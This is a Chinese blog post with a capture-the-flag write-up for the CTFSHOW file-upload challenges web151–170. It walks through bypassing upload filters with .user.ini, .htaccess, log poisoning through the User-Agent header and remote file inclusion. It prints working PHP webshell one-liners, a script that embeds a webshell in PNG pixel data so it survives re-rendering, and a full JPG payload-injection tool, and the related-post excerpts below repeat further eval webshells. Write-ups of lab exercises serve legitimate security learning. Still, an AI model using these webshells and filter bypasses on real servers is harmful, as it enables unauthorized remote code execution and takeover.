CTFSHOW-文件上传

已于 2022-08-12 17:23:36 修改
阅读量565 收藏
点赞数
分类专栏: CTFSHOW 文章标签: web安全
于 2022-05-28 22:52:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/124181563
版权

web151

前端验证

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

将这里改为php即可上传后缀为php一句话木马

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_18,color_FFFFFF,t_70,g_se,x_16

访问upload/1.php

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

web152

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

先在前端改 

然后上传时抓包,修改

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

 然后的步骤就和第一题相同的,下面的题目不再阐述

web153

使用.user.ini进行绕过

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

开启抓包

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

上传,然后

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

然后访问upload即可

web154

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

类似于上一题

 在使用上一题的方法时发现不行了,经过检查发现过滤了php

这里使用短标签绕过

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

上传成功

web155

同上题

web156

在前面的基础上过滤了[],替换成{}即可

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

这是一种不规范的写法,目前还可以用

web157

这里过滤了{}和;

使用array_pop绕过

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWWJfMTQw,size_20,color_FFFFFF,t_70,g_se,x_16

web158

 上传.user.ini

然后上传1.txt

web159

虽然过滤了log,但是还是可以包含日志

同上,先上传.user.ini

再上传

 

文件包含日志

UA头写入一句话木马

得到flag

web160

过滤了空格

按上面的方法,先上传.user.ini

再上传

先把空格改为“1”,然后修改Hex

然后一句话木马写入UA头

得到flag

web161

这道题加了一个奇奇怪怪的过滤

在上传.user.ini时,加入GIF89a

再上传1.txt,记得改0d

UA头写入一句话木马,找到flag

web162

过滤了文件内容中的“.”

使用远程文件包含,将ip改写为长地址,改写ip的java代码:

public class Main {
    public static void main(String[] args) {
        String s ="your_ip";
        System.out.println(ipToLong(s));
    }

    public static long ipToLong(String ipString){
        long result = 0;
        java.util.StringTokenizer token = new java.util.StringTokenizer(ipString,".");
        result += Long.parseLong(token.nextToken())<<24;
        result += Long.parseLong(token.nextToken())<<16;
        result += Long.parseLong(token.nextToken())<<8;
        result += Long.parseLong(token.nextToken());
        return result;
    }
}

在vps写入一句话木马,记得在vps上打开allow_url_include=On

先上传.user.ini

再上传

其中731432072就是长地址

web163

直接写在.user.ini中

web164

PNG图片二次渲染

利用脚本构造出一个png木马图片

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);    //定义图片宽和高

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);  //为图像分配颜色
   imagesetpixel($img, round($y / 3), 0, $color);  //在指定的坐标处绘制像素
}

imagepng($img,'./1.png');

/*木马内容
<?$_GET[0]($_POST[1]);?.
*/
?>

生成1.png,直接上传

因为在查看图片页面,已经有了文件包含,我们就可以直接getshell了

然后

得到flag

web165

与上题类似,是jpg的二次渲染

脚本:

<?php
    $miniPayload = '<?php echo 123;eval($_POST[0]);?>';


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                	echo "error";
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }

    //用法  php 1.php 11.png
?>

失败的可能性很大,换图片多试试

web166

这道题是上传zip文件,直接用文本格式打开zip,写入一句话木马

然后上传

点击下载文件的时候抓包

发现文件包含的点

web167

httpd->.htaccess

上传.htaccess文件(记得先改前端)

再上传jpeg

点击下载文件之后:

 

得到flag

web168

上传png文件,然后改包

得到flag

这道题应该是对文件内容进行了一定的过滤

web169

过滤了文件内容的<,不能直接写php代码,借助.user.ini

先上传.user.ini,包含日志

然后再上传index.php 

 

在UA头写入一句话木马,访问/upload

得到flag

web170

方法同上题

超级兵_140
关注
专栏目录
[CTFSHOW]文件上传
Huamang的博客
03-28 294
web 151 看源码是js判断文件类型进行拦截,先上传一个图片,再抓包改成php文件后缀就可以了,当然内容也删掉,留下php代码 web 152 和上题一样的解法 web 153 和上面一样的解法直接改后缀就没用了 测试了一下,发现是黑名单的过滤 所以就上传.htaccess文件把png文件解析成php 但是很遗憾,用不了 引用一波羽大佬的wp: 本题考点为.user.ini,详细配置可以参考官方文档 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 982
F12。
ctfshow 文件上传
qq_52671379的博客
04-06 404
ctfshow 文件上传
CTFshow-文件上传web161-170
最新发布
qq_52579508的博客
08-12 287
一开始发现不管输入什么都不行 ,添加了GIF头成功通过上传校验第二步上传 图片,包含了日志的文件 进行解析第三步访问 /upload 目录会解析 日志文件添加user-agent 头里面 添加一句话第四步 连接shell 获取flag。
CTFshow_文件上传
qq_45927819的博客
11-29 3157
文章目录web151web152web153 web151 上传图片,经过测试只能上传后缀为png的图片 抓包改数据: 使用蚁剑连接: 找到flag! web152 做法和上题一样! web153 继续之前的操作,但并没有上传成功:
ctfshow——文件上传
qq_55202378的博客
12-27 1435
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
CTFshow | 文件上传
m0_60651303的博客
08-04 810
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中找到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上传。文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令。
ctfshow-VIP题目-Web-详细解题思路
01-27
发现/editor目录,访问出现一个编辑器上传附件的地方,发现文件空间可以查看路径,发现一个nothinghere文件夹,比较可疑,里面找到fl000g.txt文件,访问/nothinghere/fl000g.txt,发现flag,flag:ctfshow{...}。...
2024年CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web(1)
2401_84252743的博客
05-01 291
版本控制很重要,但不要部署到生产环境更重要。 扫到文件信息泄露了 上面刚说完这就考到了 可以可以 访问即可。版本控制很重要,但不要部署到生产环境更重要。怎么又是这个提示 不会又是 泄露吧 在 扫一下看看 🆗这回是svn信息泄露!是的缩写,是一个开放源代码的版本控制系统使用后,项目目录下会生成隐藏的文件夹 里面包含备份文件 和这个也是一样的。 发现网页有个错别字?赶紧在生产环境改下,不好,死机了上一题刚说这一题提示就来了 就是 直接访问 即可。 只是一块饼干,不能存放任何隐私数据去网络里面找值 编码解码即
ctfshow-WEB入门-Part2-wp
F1rstb100d
09-08 506
ctfshow-WEB入门-Part2-wp
ctfshow-web入门-信息搜集(web11-20)
HkD01L的博客
06-17 547
ctfshow,信息搜集,web11,web12,web13,web14,web15,web16,web17,web18,web19,web20,writeup,ctf
CTFSHOW 文件上传
qq_51754713的博客
02-27 404
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
CTFSHOW 文件上传
m0_64180167的博客
11-14 365
直接上传 png的图片马然后抓包修改为php。
CTFShow文件上传
paidx0
08-07 456
CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件,对整个web服务起作用; 而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini, 通常用这个文件来构造后门和隐藏后门。 **利用.user.ini,要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png,意思就是使1
ctfshow文件上传
weixin_53955759的博客
04-15 816
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow-文件上传
qq_61376069的博客
01-22 582
CTFshow入门——文件上传
ctfshow---文件上传
fainpo的博客
04-10 670
来到文件上传了。
ctfshow-web-web红包题
07-14
如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值